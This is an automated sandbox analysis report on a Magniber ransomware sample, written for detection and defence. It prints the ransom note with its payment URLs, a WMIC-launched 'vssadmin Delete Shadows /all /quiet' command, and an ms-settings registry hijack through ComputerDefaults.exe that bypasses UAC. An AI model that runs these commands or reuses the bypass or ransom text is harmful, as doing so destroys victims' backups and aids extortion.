magniber | 10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e

Analysis

max time kernel
141s
max time network
133s
platform
windows11_x64
resource
win11
submitted
18/08/2021, 18:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a60c5212d52fe1488d2f82989a2947d2.dll
Size

21KB
MD5

a60c5212d52fe1488d2f82989a2947d2
SHA1

0a744d6c76902d28eb6687d66c18b0a354f29b9d
SHA256

10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e
SHA512

afd14daa5bd9448e09f25d561e8be34e16f93a2825129d165e817a4a2a3ffc339efefd6f26e78c4853acfbce7f51c88b81601324b123d8c377d72da15dcf9327

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Documents\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://78702cc0041492a03edihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://78702cc0041492a03edihlxbl.uponmix.xyz/dihlxbl http://78702cc0041492a03edihlxbl.flysex.space/dihlxbl http://78702cc0041492a03edihlxbl.partscs.site/dihlxbl http://78702cc0041492a03edihlxbl.codehes.uno/dihlxbl Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://78702cc0041492a03edihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl

http://78702cc0041492a03edihlxbl.uponmix.xyz/dihlxbl

http://78702cc0041492a03edihlxbl.flysex.space/dihlxbl

http://78702cc0041492a03edihlxbl.partscs.site/dihlxbl

http://78702cc0041492a03edihlxbl.codehes.uno/dihlxbl

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3032	4816	cmd.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3020	4816	cmd.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	476	4816	vssadmin.exe	15
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4216	4816	vssadmin.exe	15

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	WaaSMedicAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	WaaSMedicAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	WaaSMedicAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	WaaSMedicAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	sihclient.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	sihclient.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\Download\d62540ea7d8b4a9d1958e44f689fb27e\BITBFB1.tmp	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\d62540ea7d8b4a9d1958e44f689fb27e\Windows10.0-KB5004342-x64-NDP48.cab	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\WinSxS\pending.xml	TiWorker.exe
File opened for modification	C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\sls.cab	sihclient.exe
File opened for modification	C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\sls.cab	sihclient.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
476	vssadmin.exe
4216	vssadmin.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\SystemCertificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3180	rundll32.exe
3180	rundll32.exe

Suspicious behavior: MapViewOfSection 14 IoCs

pid	Process
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe
3180	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4592	WMIC.exe
Token: SeSecurityPrivilege	4592	WMIC.exe
Token: SeTakeOwnershipPrivilege	4592	WMIC.exe
Token: SeLoadDriverPrivilege	4592	WMIC.exe
Token: SeSystemProfilePrivilege	4592	WMIC.exe
Token: SeSystemtimePrivilege	4592	WMIC.exe
Token: SeProfSingleProcessPrivilege	4592	WMIC.exe
Token: SeIncBasePriorityPrivilege	4592	WMIC.exe
Token: SeCreatePagefilePrivilege	4592	WMIC.exe
Token: SeBackupPrivilege	4592	WMIC.exe
Token: SeRestorePrivilege	4592	WMIC.exe
Token: SeShutdownPrivilege	4592	WMIC.exe
Token: SeDebugPrivilege	4592	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4592	WMIC.exe
Token: SeRemoteShutdownPrivilege	4592	WMIC.exe
Token: SeUndockPrivilege	4592	WMIC.exe
Token: SeManageVolumePrivilege	4592	WMIC.exe
Token: 33	4592	WMIC.exe
Token: 34	4592	WMIC.exe
Token: 35	4592	WMIC.exe
Token: 36	4592	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4588	WMIC.exe
Token: SeSecurityPrivilege	4588	WMIC.exe
Token: SeTakeOwnershipPrivilege	4588	WMIC.exe
Token: SeLoadDriverPrivilege	4588	WMIC.exe
Token: SeSystemProfilePrivilege	4588	WMIC.exe
Token: SeSystemtimePrivilege	4588	WMIC.exe
Token: SeProfSingleProcessPrivilege	4588	WMIC.exe
Token: SeIncBasePriorityPrivilege	4588	WMIC.exe
Token: SeCreatePagefilePrivilege	4588	WMIC.exe
Token: SeBackupPrivilege	4588	WMIC.exe
Token: SeRestorePrivilege	4588	WMIC.exe
Token: SeShutdownPrivilege	4588	WMIC.exe
Token: SeDebugPrivilege	4588	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4588	WMIC.exe
Token: SeRemoteShutdownPrivilege	4588	WMIC.exe
Token: SeUndockPrivilege	4588	WMIC.exe
Token: SeManageVolumePrivilege	4588	WMIC.exe
Token: 33	4588	WMIC.exe
Token: 34	4588	WMIC.exe
Token: 35	4588	WMIC.exe
Token: 36	4588	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4592	WMIC.exe
Token: SeSecurityPrivilege	4592	WMIC.exe
Token: SeTakeOwnershipPrivilege	4592	WMIC.exe
Token: SeLoadDriverPrivilege	4592	WMIC.exe
Token: SeSystemProfilePrivilege	4592	WMIC.exe
Token: SeSystemtimePrivilege	4592	WMIC.exe
Token: SeProfSingleProcessPrivilege	4592	WMIC.exe
Token: SeIncBasePriorityPrivilege	4592	WMIC.exe
Token: SeCreatePagefilePrivilege	4592	WMIC.exe
Token: SeBackupPrivilege	4592	WMIC.exe
Token: SeRestorePrivilege	4592	WMIC.exe
Token: SeShutdownPrivilege	4592	WMIC.exe
Token: SeDebugPrivilege	4592	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4592	WMIC.exe
Token: SeRemoteShutdownPrivilege	4592	WMIC.exe
Token: SeUndockPrivilege	4592	WMIC.exe
Token: SeManageVolumePrivilege	4592	WMIC.exe
Token: 33	4592	WMIC.exe
Token: 34	4592	WMIC.exe
Token: 35	4592	WMIC.exe
Token: 36	4592	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4588	WMIC.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3180 wrote to memory of 4220	3180	rundll32.exe	82
PID 3180 wrote to memory of 4220	3180	rundll32.exe	82
PID 3180 wrote to memory of 4216	3180	rundll32.exe	83
PID 3180 wrote to memory of 4216	3180	rundll32.exe	83
PID 4220 wrote to memory of 4592	4220	cmd.exe	86
PID 4220 wrote to memory of 4592	4220	cmd.exe	86
PID 4216 wrote to memory of 4588	4216	cmd.exe	87
PID 4216 wrote to memory of 4588	4216	cmd.exe	87
PID 3032 wrote to memory of 4972	3032	cmd.exe	92
PID 3032 wrote to memory of 4972	3032	cmd.exe	92
PID 3020 wrote to memory of 4932	3020	cmd.exe	93
PID 3020 wrote to memory of 4932	3020	cmd.exe	93
PID 4932 wrote to memory of 4484	4932	ComputerDefaults.exe	94
PID 4932 wrote to memory of 4484	4932	ComputerDefaults.exe	94
PID 4972 wrote to memory of 3652	4972	ComputerDefaults.exe	96
PID 4972 wrote to memory of 3652	4972	ComputerDefaults.exe	96

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\a60c5212d52fe1488d2f82989a2947d2.dll,#1
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3180
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4220
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4592
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4216
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4588

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3032
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4972
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3652

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3020
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4484

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:476

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4216

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:4124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4620

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv sjuMneG/lkSK2C7c/HduvQ.0.2
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3132

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe f3a62cb651cc7b970e2dca730e260b2e sjuMneG/lkSK2C7c/HduvQ.0.1.0.3.0
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:772

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:1304

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe f3a62cb651cc7b970e2dca730e260b2e sjuMneG/lkSK2C7c/HduvQ.0.1.0.3.0
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2044

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe f3a62cb651cc7b970e2dca730e260b2e sjuMneG/lkSK2C7c/HduvQ.0.1.0.3.0
1⤵
- Modifies data under HKEY_USERS
PID:2504

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3180-151-0x0000028A88F50000-0x0000028A88F51000-memory.dmp

Filesize
4KB

Download
memory/3180-150-0x0000028A88F40000-0x0000028A88F41000-memory.dmp

Filesize
4KB

Download
memory/3180-152-0x0000028A88F80000-0x0000028A88F81000-memory.dmp

Filesize
4KB

Download
memory/3180-153-0x0000028A88FA0000-0x0000028A88FA1000-memory.dmp

Filesize
4KB

Download
memory/3180-154-0x0000028A88FB0000-0x0000028A88FB1000-memory.dmp

Filesize
4KB

Download
memory/3180-155-0x0000028A89A10000-0x0000028A89A11000-memory.dmp

Filesize
4KB

Download
memory/3180-156-0x0000028A89A20000-0x0000028A89A24000-memory.dmp

Filesize
16KB

Download
memory/3180-163-0x0000028A8B530000-0x0000028A8B531000-memory.dmp

Filesize
4KB

Download
memory/3180-146-0x0000028A88B70000-0x0000028A88B71000-memory.dmp

Filesize
4KB

Download
memory/3180-149-0x0000028A88F30000-0x0000028A88F31000-memory.dmp

Filesize
4KB

Download
memory/3180-148-0x0000028A88F20000-0x0000028A88F21000-memory.dmp

Filesize
4KB

Download
memory/3180-147-0x0000028A88B80000-0x0000028A88B81000-memory.dmp

Filesize
4KB

Download
memory/4124-168-0x000002AEEB3A0000-0x000002AEEB3A4000-memory.dmp

Filesize
16KB

Download
memory/4124-166-0x000002AEEAF60000-0x000002AEEAF70000-memory.dmp

Filesize
64KB

Download
memory/4124-167-0x000002AEEAFE0000-0x000002AEEAFF0000-memory.dmp

Filesize
64KB

Download